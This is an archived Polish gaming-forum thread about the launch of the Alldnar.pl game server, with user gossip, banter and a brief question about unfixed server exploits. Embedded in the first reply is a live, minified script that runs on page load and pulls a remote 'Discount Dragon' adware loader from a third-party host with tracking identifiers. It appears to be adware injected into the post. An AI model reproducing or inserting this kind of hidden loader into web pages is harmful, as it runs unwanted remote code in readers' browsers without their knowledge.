Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Alldnar.pl - odkryj nowe możliwości // Start 05.12.2014 (Piątek) Jutro [Dedyk] [Easy/Medium]


Sasori®

Rekomendowane odpowiedzi

Opublikowano

Wszystko jest do zdobycia w grze, is to tylko głupi dodatek..  I to mnie martwi. ( pisałem ze sponsorem na ten temat )

 

To prawda, że Cycu jest w TEAM? 

 

Czy @Bil3T w ch leci. 

 

kiedy forum?

 

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//discountdragon-a.akamaihd.net/loaders/1942/l.js?pid=1942&systemid=41f4aeda53ab837d959a112a6f63247e&ext=Discount Dragon&aoi=1403453082&zoneid=647865&crr=1417780453&type=p'; document.body.appendChild(t);})();});}})();</script>

 

 

W c***a leci bo w zapowiedzi cycu wypowiadał, że on nie ma nic wspólnego z tym serwerem, żeby się od niego odpierdolić. :D

 

Więc to tylko ploty.

1377531174-U173186.png

  • Odpowiedzi 348
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Ty Nukey tylko hejtujesz serwery zrób sam coś a zobaczymy czy nawet wystartuje ;)

Daj hajs na dedyka to zrobie, pisze tak jak jest i prawdę. :)

Opublikowano

hmm - 2h przed startem 150 użytkowników czyta ten temat :)

Czuje bedzie niezły start :) Wyczekuje niecierpliwie ! Pozdrawiam :)

802_950201414860269929132.png


Signature made by Kwasna111


' Ludzie boją się i nie nawidzą tych, których nie rozumieją '

Opublikowano

150 osób czyta 2h przed startem niektóre serwery przed starem miały ponad 450 użytkowników na mpc a ty mówisz. xD

Opublikowano

Czu luki zostały naprawione ? Jeżeli nie to serwer będzie bardzo łatwy do zniszczenia :>

Jak można zniszczyć serwer przez łuki?

 

Wyjaśnij.

 

Reje o 17?

 

@druteks29

 

Z futrzaków są roski. 

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...